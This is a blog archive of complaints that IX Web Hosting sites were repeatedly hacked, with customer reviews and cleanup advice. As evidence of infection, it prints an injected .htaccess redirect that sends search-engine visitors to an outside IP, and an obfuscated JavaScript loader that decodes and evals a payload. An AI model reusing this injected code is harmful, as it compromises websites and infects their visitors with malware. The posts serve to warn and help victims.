hacking « IX Web Hosting Warning

EASY Access to IX Web hostings Server ROOT

From a Unhappy IX customer

I was beginning to think I was crazy. My site would get hacked and I would change the password. This would keep happening over and over. Yet every time I would call in they would say it was my fault. Well today I discovered that once again my site had been hacked as well as all the other domains in my userid for them. While going through one of my sub domains I found a hackers control panel which I downloaded and took a screen shot. I even looked around in it. I realized quite quickly that I had server root access and I could see other peoples files like I was on a regular computer. This control panel seems to have it all. Anyway here is a screen shot for all you who wonder what is going on:

I have marked my info out to spare me as well as the folder I was browsing. But this control panel seems to have any exploits you want on it with very little effort. It even has a handy self kill button which I used. Of course I am sure they will be back and hack right back in. Meanwhile I have to look into another host.

CLICK ON IMAGE FOR LARGER PREVIEW

May 26, 2009 Posted by neverixweb | IX Web Hosting | AVOID IXWEBHOSTING, BANNED, hacked, hackers, hacking, iFrame injection, injected script, malicious files, pathetic, unprofessional, unreliable | 2 Comments

Tip from a reader “How to clean the Yahoo Counter Injection Script”

Hey buddy,
nice website, i wish i had seen it before I renewed my contract with the crooks at IX for 2 more years…
well, i am writing because i couldn`t find on your website a solution to clean the infections automatically. so maybe you want to post a solution:

here is what I did:

1 – download the entire site
2 – Open an infected file with Adobe Dreamweaver
3 – Look for the infected code, select all of it and copy it to the clipboard (starts with “<?php if(!function_exists(‘tmp_lkojfghx’))…”). You must copy ALL the code!
4 – Still on dreamweaver, click on EDIT>FIND AND REPLACE
5 – on the FIND box you paste the infected code
6 – On the FIND IN dropdown select FOLDER and point it to the folder where your website was downloaded.
7 – click on REPLACE ALL (dreamweaver will replace the code with whatever is on the REPLACE box, as we didn’t write anything there, it will clean the code)

I found out that all the infected files on my sites had exactly the same code, so it was quite fast to remove them.

Ivan

Thanks Ivan for your feedback, I hope this helps others, also sorry to hear your sites are still constantly being injected. It’s clear that IX Web Hosting still has not got a clue how to solve this issue, and on top of this they are having 3 other mayor issues to deal with.

February 13, 2009 Posted by neverixweb | IX Web Hosting | AVOID IXWEBHOSTING, hacked, hackers, hacking, iFrame injection, injected script, insecure, unprofessional, unreliable, yahoo counter | 6 Comments

IX Web Hosting Reviews Jan. 2009

George , 30th 2009f January, 2009
If you are planning to run a serious website, DO NOT use Ix web hosting, they are more trouble than they are worth. Virus, Slow, Database problems, and Email issues.

Paolo, 23rd 2009f January, 2009
After reading the reviews about the servers / database’s slowing down at a certain time, I checked my log files, and it’s true, like clock work at 2 am every night they come to standsill intill 7.30 am then they pick up again. I posted a support ticket, after almost 24 hours I finally got a response telling me the ticket has been forwarded to support!!!!!… What is the point of that??.
I am looking into moving my sites to HostGator.

Gary, 22nd 2009f January, 2009
I am so sick and tired of ix web hosting!
I have had nothing but problems with them. Their support is useless, rude and they lie.
For the truth visit
http://ixwebhostwarning.wordpress.com/

Marky, 22nd 2009f January, 2009
Hacked, Injected, De-Faced, Slow, Useless Support and lots more.
IX is 100% USELESS!!

jack, 21st 2009f January, 2009
The server of ixwebhosting is down now. It has been on and off and stalling for the past month.. they keeps saying it was fixed but it isn’t. It’s very upsetting. We have had to complain and make complaints every day three times…. anyone know of a better hosting for Windows?

Melanov, 21st 2009f January, 2009
haha, i know how ixwebhosting is being attacked, I know who is behind the injecting. Over a year ago we contacted ix explaining they had problems, we had a very rude reply telling us it was lies, and the servers were secure. We added a folder with a fake website to at least 200 websites. Now ix wanted to listen, and even offered to pay per security issue.. but now it is too late.
ixwebhosting should listen when help is offered.

Gerald W, 21st 2009f January, 2009
I am in the process of moving my 12 sites from ix, I never had a problem with them for over 3 years, but as of November it has been one injection after the other. IX is not willing to help customers, instead they just want their money, and point the finger at customer once EVERY site on the servers are injected.
Don’t waste your time or money on these people.

Michael, 18th 2009f January, 2009
I completely agree with Blake, every night at midnight ALL my sites on two buisness accounts come to a screeching halt, everynight I call ix, and they appologize, and tell me they will find the cause and firewall the site, or even suspend the site(s) causing the slowdown, but this has been going on for weeks.
Also, I use “Mailwasher” that connects to my mailserver every 10 minutes, and every morning when I check mailwasher, I get an error log telling me that it could not connect to the server, with at least 20 times that it could not connect to the server.
It’s time to drop ix web hosting
AVOID

Blake, 17th 2009f January, 2009
I am totally and completely disgusted with IX Webhosting. It used to be a great host and I recommended it to everyone I could. But something has changed. I believe they got sold. Since then, we have had nothing but endless trouble with this host…

Last year, they proudly moved to a new Data Center. Of course this caused us problems for several months. They kept apologizing, but the problems persisted. After a very long period, things calmed down and remained that way until November…

Without prior warning, IX moved our site to a new server in November. After 60+ hours of calling, using Live Chat, and using the ticket support system, they finally worked out most problems. I felt like I had to beg to get IX to help resolve the problems that they created. I lost an entire weekend fighting them. The IX response times average between 12-24 hours…

Then again this January, IX updated all of our cgi-bin files in our domain and all of our sub-domains recreating the problems that were caused in November’s unnecessary server move. Again, it took over 60+ hours to get our site up and running. I had to find workarounds to get our site up and running, and amazingly, IX tried to take credit for getting our site up and running again even though they had nothing to do with it…

Even though our site is up and running now, we still have many problems. After 176 hours of fighting IX for help, they have yet to correct the Cron job errors that still plague our site…

The last two days, the server has crashed in the evening requiring another call to IX to get the server restarted/reset and our site back online. This was the same pattern that plagued us after the Data Center move last year. And early every morning, the page load response times drag down to a crawl. This seems to start between midnight and 4 AM every single night. The other day, the slowness continued well into the following day. We get an apology from IX each time this happens, but they don’t seem to be doing anything to permanently correct it…

IX has tried very hard to blame these problems on our code, which worked fine before the server move in November and again up until January. IX does not want to take responsibility for their actions and it is frustrating and disgusting dealing with them. I cannot in good conscience recommend IX Webhosting to anyone until they improve the skills of their own Technical Support staff. It wouldn’t hurt if they hired a few more knowledgeable people to improve their response times too. Waiting 12-24 hours for each new response to a ticket is totally unacceptable. With IX’s lack of effort, a resolution to a problem can drag on for days and weeks. IX does the bare minimum to assist its clients and they do it as slow as they possibly can…

Dealing with IX technical support gets real old real fast. I wouldn’t wish this on anyone…

Hans, 17th 2009f January, 2009
Do not believe their “Money Back Guarantee” After 3 weeks I requested a refund, and I only got about 30% of the full sum, they even charged me $20 for a .com, $20!!!, I can get these for $4.95.
Stay Away from these idiots
ett, 11th 2009f January, 2009
If IX is no 3 in the Top 10 companies list, what is the service level provided by those below on the list? Must be pretty terrible, eh?!
I have experience from IX as well as other hosts. Of the ones I’ve used, IX is the worst, one.com (in Denmark!!) has given me the best value for money.

Mike, 10th 2009f January, 2009
Bloody USELESS!

Muluut, 10th 2009f January, 2009
I am now just 3 months hosting with ix hosting and every day I having big problems. these people do not help and all my sites are hacked. I ask for backup and they tell me backups are no good, backups are hacked same as websites
ix hosting is no good for hosting.

Laurie, 10th 2009f January, 2009
With them for about 2-4 years. Was OK, nice customer service but innefficient now that I am ahving BIG problems – and now has been a nightmare since January 1st 2009. Now all my six websites are not even loading. Not even an error message! “server taking too long to respond” My site was hacked apparently (never happened in 10 years) and since then problems everyday. Even google has put a warning to visitors about malware from my site. My Google results have dropped completly Now have been pfflne for 24 hours. Disaster. Will change. I was told they are having problems with one of their servers. I don’t care. I’m changing. Will pay more for more.

Jonathan, 09th 2009f January, 2009
I too have been with IX for just under 4 years, and I too have pure html sites, I have 7 websites, I have always been very happy with IX, and up until September 2008 I had never had any issues. But since September my sites have been hacked, changed and re-directed on a weekly basis. IX keeps telling me about folder permissions and Ftp viruses, but I do not run any scripts, and do not have any folders, so I know that cannot be the cause. I will be moving all my sites to another host.

Archer Rejn, 09th 2009f January, 2009
I have been with IX for already 4 years and have never had any problems. May be cause I do not use any free php applications like wp or Joomla ? All my sites are html files with some Java scripts. I have never been hacked and all my sites load pretty fast.

Magix, 09th 2009f January, 2009
Don’t waste your time or money on these people. 100% USELESS!

kjett, 09th 2009f January, 2009
There is at least one positive aspect of using IX, viz. you learn a lot about the perils of using a web host without sufficient technical knowledge and/or security routines.
You learn that you yourself have to take responsibility for implementation of all the precautions needed, such as recurrently (frequently) making sure your hosted domains haven’t been hacked, having all directories properly chmod-ed and .htaccess-ed, and keeping updated backups on a local server.
These security routines will prove to be useful when you move to a hopefully more competent and secure web host.

beyaz, 06th 2009f January, 2009
have the same problem!!!! they are just after money instead of clearing their s**t!

George W Bush, 05th 2009f January, 2009
Don’t waste your time with these people, they are just a bunch of incompetent retards.

Sammy J, 05th 2009f January, 2009
4 days ago my 6 sites were injected with code, I spent 2 full days cleaning my sites, ix wanted to charge me $80 and hour to clean them, today all 6 sites are injected yet again.. I’m moving to another host, People, beware of IX they do not give a damn about your sites, all they want is your money.

Anita, 03rd 2009f January, 2009
Add me to the list of customers that have been affected by ix’s .htaccess vunerability, and yes they are blaming me, the best part is, they are willing to fix this for me for $80 !!

Roger no Kids, 02nd 2009f January, 2009
@ Roger Kids..
You TWAT!!..
People don’t like IX because they HAVE tried them!!.. If you haven’t tried them, how is a person suposed to know if they like them or not?..
All a person can expect, is what they are promised and what they pay for.. NO MATTER what the price is.
IX are RIP OFF’S they promise, take your money and accuse you for their incompetance.

Roger Kids, 01st 2009f January, 2009
Cmon` guys. If you don`t like IX why you choose it? Try to spin around for hosting which is better and cheaper. Let`s see what u`ll get

February 2, 2009 Posted by neverixweb | IX Web Hosting | AVOID IXWEBHOSTING, hacked, hackers, hacking, iFrame injection, innocent customers, IX Web Hosting, malicious files, pathetic, terrible, unprofessional, unreliable, yahoo counter | 1 Comment

IX Web Hosting’s PHP Upgrade Notification

Dear Nicole **********,

We are happy to inform you that over the next two weeks we will upgrade PHP to the latest 4.x version (4.4.9) on the web server your website is currently being hosted on. This upgrade will resolve many security exploits and make services more stable.

As part of this upgrade, we will migrate from an Apache Module to a CGI based installation that gives you more control over many PHP settings. Once implemented, you will have the ability to upload your very own php.ini file into your cgi-bin folder as needed.

After the upgrade, your website may experience a few errors, all of which can be quickly resolved. Most are caused by having PHP directives inside an .htaccess file.

To fix this problem, simply login to your control panel and click on the WebShell icon. The .htaccess file will not be viewable unless you have “show hidden files” checked in your WebShell settings. Open the .htaccess file and remove any lines that start with “php_”. If you need to retain these settings, then they must now go into a php.ini file and placed into your cgi-bin folder.

If you are running PHP in any of your HTM/HTML files, please add this line to your .htaccess file:
AddHandler php-script .php .php3 .php4 .htm .html .phtml

If you have any questions or concerns about this upgrade, please do not hesitate to contact us 24/7 via live chat, ticket, or phone support and we will be glad to assist.

I hope you will enjoy the new features and increased security!

Best Regards,

Fatima Said, CCO
IX Web Hosting

January 29, 2009 Posted by neverixweb | IX Web Hosting | AVOID IXWEBHOSTING, hacked, hackers, hacking, iFrame injection, infected, injected script, IX Web Hosting, malicious files, pathetic, promise, terrible, thieves, unhappy, unprofessional, unreliable, yahoo counter | 1 Comment

IX Web Hosting still blames 777 permissions

Hundreds of unhappy IX Web Hosting Customers are contacting me, telling me they are still being blamed for the Yahoo Counter Script Injection and the .htaccess hack.

IX is blaming ” Folder Permissions “ saying 777 should not be used, and in the case that NO FOLDERS are being used, they turn to the ” Ftp Virus” BOTH of these are complete rubbish and LIES, and if you corner an IX Web Host manager with some facts and a bit of knowledge they will admit that it IS an issue on the ” IX Servers”

I have been PERSONALLY told by THREE MANAGERS.. Kenny, Drew and Lauren that IX is aware that they have security issues, and each time they assure me that the problem will be fixed soon, that was 9 months ago!!
The problem has not been solved, and is nowhere near being solved, actually it is getting worse.
Almost 10 months ago the problem was the iFrame Yahoo Counter was injected into every file, today the problems are numerous 3 different injections and a .htaccess hack!! on both the php4 and php5 platform.

So, why is IX Web Hosting admitting they have issues to certain people, and LIEING to others? The reason to this is because the Support Monkeys have been told to NEVER admit that IX has issues, if the monkeys admitted to every customer that it was due to IX’s security issues that more than 120.000 sites were being infected on a weekly basis, all hell would break loose and somewhere along the line someone would sue.
So, as of yet for as far as I know it is only certain managers that are admitting to certain people, that IX is to blame.

IX Web Hosting blames 777 folder Permission!!!… Do me a favor!!, it’s 2009, HUNDREDS OF MILLIONS of people are using Open Source CMS (content management system ) such as WordPress, Joomla, Drupal etc..etc..
Many of these scripts will not work without 777 permission ( images, templates etc)

If in 2009 IX Web Hosting cannot host a CMS site without it getting injected or defaced, then they are NOT FIT to host websites and should pack their bags and leave town … for good!!

Why is it, that IX has a page on their website that explains in detail how to install and use WordPress and Joomla, but they still blame customers for using these CMS scripts.

Next time you speak to an IX Support Monkey ask them how the following is possible

5 html sites ( 100% html) not running any scripts or folders get injected?
How is it possible to MASS overwrite 644 files (.htaccess)
How is it possible to MASS add .htaccess files
Why is it, that if I did have an Ftp Virus, they only inject 2 buisness accounts, when they would have access to all 4?.. Why dont they inject all 4?
Why is it only IX Web Hosting and Host Excellence ( owned by ix web hosting) are having these problems? if it was a 777 folder permission issue 100’s of Millions would be affected, and EVERY webhost in the world would have the same problems.
ANY Server Side injection of 1000’s of sites is surely the responsibility of IX, and NOT a Folder Permission issue.. I have access to all my folders, but there is no way that I can access someone elses site.
It’s clear that this issue is server root related.

One more thing, a 777 folder used by the likes of WordPress or Joomla ARE SAFE!!.. Does IX Web Hosting really believe that they can carry on blaming customers? MORE THAN ONE THIRD of ALL IX Web Hosting sites are infected!!… More than 120.000 sites infected !!

January 23, 2009 Posted by neverixweb | IX Web Hosting | 777, 777 folder permission, AVOID IXWEBHOSTING, customers, disater hosting, folder permission, hacked, hackers, hacking, idiots, iFrame injection, injected script, innocent customers, insecure, liars, malicious files, pathetic, root, server, unprofessional, unreliable | 3 Comments

IX Web Hosting making money from their INSECURE SERVERS

For going on 10 months now ix web hosting’s servers have been under attack, both the older php4 and the new php5 are full of security issues, and have been seeded and are constantly injected with various scripts and / or the .htaccess file gets renamed and customer sites are re-directed.

MORE than 120.000 IX hosted sites are injected / .htaccess hacked on a weekly basis, an excellent oppertunity for the scum IX to make a quick buck!!

IX Web Hosting will clear up the mess that is caused by their extreme Incompetence and INSECURE SERVERS for just $80 AN HOUR!!

A few days ago I was contacted by an IX customer that hosted 5 html sites ( not a single script) all 5 websites were injected with the Yahoo Counter Script, this was the 3rd time in one month that this had happened, each time she just re-uploaded all her sites, but still her sites got injected. The 4th time she approached IX to help her get her sites back in order. IX charged her $160 ( 2 hours) to get her sites back to normal. 6 DAYS later all her sites were injected, but luckily the bastards at IX were willing to help her again for another $80 an hour.

January 20, 2009 Posted by neverixweb | Uncategorized | AVOID IXWEBHOSTING, crap, criminal, crooks, customers, hacked, hackers, hacking, idiots, iFrame injection, infected, injected script, innocent customers, liars, lies, pathetic, terrible, thieves, unhappy, unprofessional, unreliable | 8 Comments

Is YOUR site INFECTED by the Yahoo Counter or .htaccess

A lot of people are contacting me, asking HOW you would know if your site is infected?.
Let me start by saying that in some cases you will know immidiately when somthing is wrong, but in other cases it might not be too clear.

The YAHOO COUNTER SCRIPT

Click Image to Enlarge

is an iFrame Javascript injection that injects code into the Footer, Body, or Header, or all three at once.
Thousands of IX web Hosting customers are infected with this code, and they do not even know it! The web Page looks normal, but this can be very dangerous, your website will eventually drop from ALL the mayor search engines, and your domain will be flagged as “Dangerous Malware” by all the search engines.
To check if you have the Yahoo Counter injected, visit any search engine, and visit your site, If your site loads as it should, BUT it still shows “Loading” in the taskbar for some time, and then in most cases ( but not always) an ” Acrobat Reader” Error message will pop up.

Now you must Check the “Source Code” ( Menu Bar –> View –> Source ) and you will notice the Code that has been injected.

The .htaccess Injection

This is a very sneaky Injection, the reason being, is because most people that have and check their websites, access them by either a shortcut, or directly through the search bar by using the url, In both these cases, your website will be perfectly normal, BUT, anyone trying to access your website through any of the mayor Search Engines, will be re-directed.

fakeav

Click Images to Enlarge

Once that is done, a FAKE ANTI VIRUS will pop up, and start scanning your PC, it will then alert you that you have dangerous files on your PC, and if they should be removed, if you click YES, you are screwed!!, a Trojan with KeyLogger will be executed on your PC, and you are INFECTED!!…

Anyone who has the FAKE ANTI VIRUS pop up, should just click off the site NEVER click “Yes” or “No”.. just click OFF the page , if your PC freezes, use “Ctrl-Alt-Delete” and Stop the process… then out of precaution you can “Delete” your cached internet files.

An example of the injected .htaccess file.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* h**p://87.248.180.89/topic.html?s=s [R,L] ( link altered by ME )

Remember, you only get re-directed if you click on your url from a search engine

January 11, 2009 Posted by neverixweb | IX Web Hosting | AVOID IXWEBHOSTING, customers, hacked, hackers, hacking, iFrame injection, infected, injected script, insecure, malicious files, unhappy, unreliable, virus | 2 Comments

IX Web Hostings Servers using both Php4 and Php5 INFECTED

infectedx

As I wrote yesterday, MORE THAN ONE THIRD OF ALL IX Web Hosting’s hosted sites are INFECTED.
And to make things worse, the problem is spreading.
Up until Jan. 3rd 2009 it was only the older servers still running Php4 that were being affected, but now even the NEW server blocks, running Php5 are being injected.
IX Customers with sites on the server block with mysql address mysql501.ixwebhosting.com that runs php5. are being injected.

This is bad enough, and the fact that after 9 MONTHS!!! IX Web Hosting has still NOT GOT A CLUE how this is being done is a complete DISGRACE!!
And to add salt to the wounds, IX is not just being attacked with one form of iFrame injection, NO, IX is being attacked THREE different ways.
1) The notorious ” YAHOO COUNTER” is being injected into the FOOTER of every file.
2) The .htacces File that is overwriting and / or adding an . htaccess file into the root of every site and re-directing sites
3) As of Jan. 3rd 2009, a SECOND but modified version of the ” YAHOO COUNTER ” iFrame injection is now being injected into BOTH the Header, AND / OR Body of every file.

Today an IX Web Hosting customer sent me a link to their site, that was injected with THREE Yahoo Counters, Header, Body and Footer.
The owner of the site told me that the site would take ages to load, and would often even timeout, and Google had dropped the site completely from the Search Engine, penalized because of the “Malware Script”

Here is a quote from IX Support’s Alex Karamushko :

We have currently problem with Yahoo counter hack, but our system administrators and security analysts working hard for finding exact reason of that problem and we can assure you that this will be fixed shortly.

After 9 months, I ask myself what ” shortly” actually means?!.. Another week?, month?, or maybe 3 months?.. because I was told by “AGENT IX” that at the rate things are going now, by May 2009 EVERY website hosted at IX will be infected by these injections.

January 11, 2009 Posted by neverixweb | IX Web Hosting | AVOID IXWEBHOSTING, customers, hacked, hackers, hacking, iFrame injection, infected, injected script, innocent customers, insecure, lies, malicious files, terrible, unprofessional, unreliable, yahoo counter | 13 Comments

IX Web Hosted sites Hacked & Defaced Jan 9th 2009

http://efamili.com/

http://dabasan.com/beads/archive.php

http://www.capetowntips.com/

http://icaav.com/phpBB2/

http://buildingwithtyres.com/

http://www.mortgageservices.com.au/

http://terrybeitel.com/

http://ebookdirectory.net/

http://www.strangeauction.com/

http://annualkellyfamilyreunion.com/forum/

http://www.scotlandsguesthouses.com/

http://www.themerchfoundry.co.uk/helpcenterlive/

http://mediaportalen.net/

January 9, 2009 Posted by neverixweb | IX Web Hosting | AVOID IXWEBHOSTING, hacked, hackers, hacking, infected, injected script, insecure, malicious files, pathetic, unreliable | No Comments Yet

A NEW wave of iFrame Injections for IX Web Hosts Customers

It has come to my attention that a NEW wave of iFrame injections has infected 1000’s of new IX Web Host Customers, unlike the previous injection, that injected javascript into the footer of every file, this new piece of code is being injected into the “Header” of every file..

The new code looks like this:

<script language=JavaScript>function tobnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,62,45,0,25,55,44,41,2,31,0,0,0,0,0,0,3,38,33,21,20,16,19,10,42,35,13,32,24,17,4,40,46,56,53,
15,60,5,50, 47,57,48,51,0,0,0,0,26,0,49,6,29,7,12,54,34,23,28,58,11,14,36,43,27,8,59,52,39,37,30,61,1,18,22,9);for(s=Math.ceil(c/m);s>0;s–){h=”;for(i=Math.min(c,m);i>0;i–,c–){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(224^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}tobnb25(’hAOIN1QtlSztwx4tFfvam1OIUuTfN1QKCfLBlx7ZhG4gDypVdZcgbG4KJypYlbLIUfcf4FLrE@TmxlL
58IptD87fS0TRF84BUxOZzjOBS1etS0vak5_KD gOZx1LtlxpV2bptpj6mwjpBSfpVzneRCkJRLsTVdscfNbJrdWTa8@TtzxptpfJRDIJYpyLgdgptcdJrM
@TmDAzIUf2YNAQmEVLK4H2ISjLB8qJ5SsOBxbLIUjvaz@’)</script><!– yourdomain.com –>

Manager Kenny at IX Web Hosting informed a customer today ( Mon 5th Jan.) that they were testing right now and should be completed in a week or two…

ONE OR TWO WEEKS!!!.. Hey we have been waiting for 8 MONTHS!!!! You would think that by the advice is giving all their paying customers, and blaming them for everything, and then offering to fix the problem for $80 AN HOUR!!.. that they would know how to fix this problem, but is is clear they do not, and instead of putting more time and effort into solving this, what does IX do??… TRY AND MAKE MONEY FROM THE PROBLEM!!!… Thats correct, IX Web Hosting is offering to fix / clean customer sites for $80 an hour!!… This is an absolute disgrace!!

To me it is clear that a large group of people know the vulnerability at IX servers, and various people are now injecting their own script, thats why we are starting to see various different scripts appearing.

January 5, 2009 Posted by neverixweb | IX Web Hosting | AVOID IXWEBHOSTING, crooks, hacked, hackers, hacking, idiots, iFrame injection, infected, injected script, innocent customers, malicious files, pathetic, thieves, unhappy, unprofessional, unreliable | 1 Comment

IX Web Hosted Sites Hacked and Defaced Jan. 2nd 2009

January 2, 2009 Posted by neverixweb | IX Web Hosting | AVOID IXWEBHOSTING, defaced, defaces, hacked, hackers, hacking, idiots, infected, IX Web Hosting, malicious files, never, pathetic, promise, terrible, unhappy customers, unprofessional, Unproffesional, unreliable | 2 Comments

IX web hosted sites Hacked and Defaced December 29th

December 29, 2008 Posted by neverixweb | IX Web Hosting | AVOID IXWEBHOSTING, defaced, hacked, hackers, hacking, idiots, infected, innocent customers, insecure, pathetic, unreliable | No Comments Yet

IX Web Hosting and the Yahoo Counter Script Injection

I started this blog just 2 weeks ago, and today I recieved my 1000 th Email asking me about the code that is injected into the footer of every file hosted on seeded IX Web Hosting Servers.

Hundreds of IX customers, are contacting me to ask about the Injected script ( posted in a previous post) they are asking me HOW to remove it, because they cannot find it…

The Reason they cannot find it??

Because of a MASSIVE SECURITY ISSUE on IX WEB HOSTING’s SERVERS!!.. the script is NOT actually put onto any of your pages, the script is actually hidded somewhere on the server..

So far I have found 5 “seeds” .. These are the codes that are appearing in over 100,000 sites

Remember to view the “source code” in the above links.

Very interesting is the second “seed” that is actually in an IX standard “modlogan” folder, that is standard a chmod 700 .

Secondly it should not be possible on any shared server to inject this script onto EVERY file on that server. The fact that this is happening means that IX web Hosting has not got a clue how to protect their servers, and customer web sites.

So as you can see, this script IS NOT actually put into your script, that is why you cannot find it.. HOWEVER, somewhere on your site, there is a bit of code ”Calling” this script, and that appears in your pages.
Check ALL the pages that get called for every page, ie. header, footer, index, sidebar etc.

So far I have evidence and proven that the following IX servers running the following Database’s are seeded:

mysql33.ixwebhosting.com
mysql15.ixwebhosting.com
mysql27.ixwebhosting.com

If you know of any others that are seeded, please let me know.

Hope this helps

:: Some people have contacted me to tell me that the Injected Script is ( also ) injected into the database, and in some cases a new table is created.
I have checked 9 databases of infected sites, and I have not yet come across the script in my Database’s, so I think that this might be “script” related, maybe that some scripts such as PhpBB2 allows for this to happen, so I recommend searching your Database for the script as well ::

December 24, 2008 Posted by neverixweb | IX Web Hosting | AVOID IXWEBHOSTING, hacked, hackers, hacking, idiots, iFrame injection, infected, injected script, innocent customers, Joomla, lies, malicious files, unreliable, Wordpress, yahoo counter | 11 Comments